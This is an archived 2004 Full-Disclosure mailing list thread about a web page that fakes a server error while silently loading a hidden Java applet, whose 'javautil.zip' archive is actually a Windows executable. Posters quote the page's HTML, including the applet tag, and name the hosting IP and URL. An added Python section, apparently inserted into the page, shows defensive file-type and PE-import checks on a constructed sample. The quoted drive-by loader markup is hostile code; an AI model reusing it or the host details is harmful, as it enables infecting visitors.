Full Disclosure mailing list archives
RE: [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747
From: "Aditya, ALD [Aditya Lalit Deshmukh]" <aditya.deshmukh () online gateway technolabs net>
Date: Mon, 16 Feb 2004 10:08:47 +0530
This is not a zip file - it's a Windows exe complete with an MZ header and calls to LoadLibraryA & GetProcAddress exported from KERNEL32.dll. I am debugging through it to see what exactly it does... (this one is real good) but how come IE and Mozilla started it up as a Java applet without any error message? -aditya
-----Original Message-----
From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Nicola Fankhauser
Sent: Monday, February 16, 2004 12:50 AM
To: full-disclosure () lists netsys com
Subject: [Full-Disclosure] Re: [Full-disclosure] http://federalpolice.com:article872@1075686747

hi jedi

On Sun, 2004-02-15 at 18:45, Jedi/Sector One wrote:
> This is equivalent to http://64.29.173.91/

ok, and the html of the index page is as follows:

<html><body bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
<h2>SERVER ERROR 550</h2>
<applet ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></applet></body></html>

now, the "SERVER ERROR 550" is clearly a fake - the java applet below just starts fine. strangely, the 'javautil.zip' is not a valid zip-file, yet 'appletviewer' and mozilla (don't know about MS IE; too dangerous :) happily start the applet without any hiccups or exceptions, and mozilla states 'Applet BlackBox started' in the status bar.

is there anybody knowledgeable interested in un-zipping, de-compiling and analysing this surely malicious applet? I would like to know what mozilla just executed on my behalf there... :(

FYI, the file 'javautil.zip' attached is directly taken from the site mentioned above.

regards
nicola
________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
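The check Aditya describes above (the file served as javautil.zip starts with an MZ header and imports LoadLibraryA and GetProcAddress from KERNEL32.dll) can be automated. The following is an added example and is not code from this thread, nor is it the attachment discussed: it classifies a blob by its magic bytes rather than its filename (ZIP local-header/EOCD signatures vs. MZ with a valid e_lfanew pointing at "PE\0\0") and then walks the PE import directory to list the DLLs and functions a PE32 or PE32+ file imports. Because the real javautil.zip is not on this page, the sample PE is constructed inline by build_sample_pe(); it is a header-only PE32 with one .idata section and no code, built purely so the parser has something to read. The names sniff, pe_imports, check_archive and build_sample_pe are this example's own.

```python
import struct

# ZIP signatures: local file header, end-of-central-directory (empty archive), spanned marker
ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")


def sniff(data: bytes) -> str:
    """Classify a blob by magic bytes only; the filename or extension is never trusted."""
    if data[:4] in ZIP_MAGICS:
        return "zip"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]      # offset of the PE signature
        if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            return "pe"
        return "mz-dos"                                          # DOS stub without a PE header
    return "unknown"


def _cstr(data: bytes, off: int) -> str:
    return data[off:data.index(b"\0", off)].decode("ascii")


def _rva_to_off(sections, rva: int) -> int:
    """Map a relative virtual address to a file offset via the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} maps to no section")


def pe_imports(data: bytes) -> dict:
    """Return {dll_name: [imported function or 'ordinal#N', ...]} from the import directory."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]       # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]  # COFF SizeOfOptionalHeader
    opt = e_lfanew + 24
    is64 = struct.unpack_from("<H", data, opt)[0] == 0x20B       # PE32+ magic
    dd = opt + (112 if is64 else 96)                             # start of the data directories
    imp_rva = struct.unpack_from("<I", data, dd + 8)[0]          # directory 1 = import table
    sections = []
    for i in range(nsec):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    imports = {}
    if imp_rva == 0:
        return imports
    off = _rva_to_off(sections, imp_rva)
    while True:   # one IMAGE_IMPORT_DESCRIPTOR (20 bytes) per DLL, terminated by an all-zero entry
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, off)
        if name_rva == 0 and ft == 0:
            break
        thunk_off = _rva_to_off(sections, oft or ft)            # prefer the unbound lookup table
        fmt, size, ord_flag = ("<Q", 8, 1 << 63) if is64 else ("<I", 4, 1 << 31)
        funcs = []
        while True:
            entry = struct.unpack_from(fmt, data, thunk_off)[0]
            if entry == 0:
                break
            if entry & ord_flag:
                funcs.append(f"ordinal#{entry & 0xFFFF}")
            else:
                funcs.append(_cstr(data, _rva_to_off(sections, entry) + 2))   # skip 2-byte hint
            thunk_off += size
        imports[_cstr(data, _rva_to_off(sections, name_rva))] = funcs
        off += 20
    return imports


def check_archive(filename: str, data: bytes) -> str:
    """Flag a file served as .zip/.jar whose bytes are not actually a ZIP archive."""
    kind = sniff(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in ("zip", "jar") and kind != "zip":
        return f"MISMATCH: {filename} is {kind}, not a zip archive"
    return f"ok: {filename} is {kind}"


def build_sample_pe() -> bytes:
    """Constructed stand-in for the attachment: header-only PE32 with a single .idata
    section importing LoadLibraryA and GetProcAddress from KERNEL32.dll. No code runs."""
    sec_rva, sec_raw = 0x1000, 0x200
    sec = bytearray(64)                     # room for 2 descriptors (40) + ILT (12) + IAT (12)
    dll_off = len(sec)
    sec += b"KERNEL32.dll\0"
    hints = []
    for name in (b"LoadLibraryA", b"GetProcAddress"):
        sec += b"\0" * (len(sec) % 2)       # hint/name entries are word-aligned
        hints.append(len(sec))
        sec += b"\0\0" + name + b"\0"       # 2-byte hint followed by the NUL-terminated name
    thunks = struct.pack("<III", sec_rva + hints[0], sec_rva + hints[1], 0)
    sec[40:52] = thunks                     # OriginalFirstThunk table
    sec[52:64] = thunks                     # FirstThunk (IAT)
    sec[0:20] = struct.pack("<IIIII", sec_rva + 40, 0, 0, sec_rva + dll_off, sec_rva + 52)
    vsize = len(sec)
    sec += bytes(sec_raw - len(sec))        # pad raw data to the file alignment
    dos = bytearray(64)
    dos[:2], dos[0x3C:0x40] = b"MZ", struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)     # ImageBase, alignments
    struct.pack_into("<II", opt, 56, 0x2000, sec_raw)              # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8, sec_rva, 40)              # import directory RVA/size
    sechdr = b".idata\0\0" + struct.pack("<IIIIIIHHI", vsize, sec_rva, sec_raw, sec_raw, 0, 0, 0, 0, 0xC0000040)
    hdr = bytes(dos) + coff + bytes(opt) + sechdr
    return hdr + bytes(sec_raw - len(hdr)) + bytes(sec)


if __name__ == "__main__":
    sample = build_sample_pe()
    print(check_archive("javautil.zip", sample))
    for dll, funcs in pe_imports(sample).items():
        print(f"  {dll}: {', '.join(funcs)}")
```

Running it on the constructed sample reports a mismatch for javautil.zip and lists KERNEL32.dll with LoadLibraryA and GetProcAddress; pointing check_archive and pe_imports at a real downloaded file is the same two calls on its bytes. A ZIP verdict from sniff only says the container signature is present; that is the check the applet loaders in this thread evidently skipped, and a real triage would go on to open the archive with zipfile before trusting it.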
Current thread:
- Buffer overflow in mnoGoSearch Jedi/Sector One (Feb 15)
- http://federalpolice.com:article872@1075686747 Lee (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 jan . muenther (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 Lee (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 Jedi/Sector One (Feb 15)
- [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747 Nicola Fankhauser (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 Erik van Straten (Feb 15)
- [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747 Byron Copeland (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 D.J. Capelis (Feb 15)
- RE: [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747 Aditya, ALD [Aditya Lalit Deshmukh] (Feb 16)
- Re: http://federalpolice.com:article872@1075686747 jan . muenther (Feb 15)
- http://federalpolice.com:article872@1075686747 Lee (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 Cael Abal (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 John Galt (Feb 18)
- [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747 B3r3n (Feb 15)
- RE: http://federalpolice.com:article872@1075686747 Bill Royds (Feb 15)
- [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747 Noldata TAC (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 Alain (Feb 16)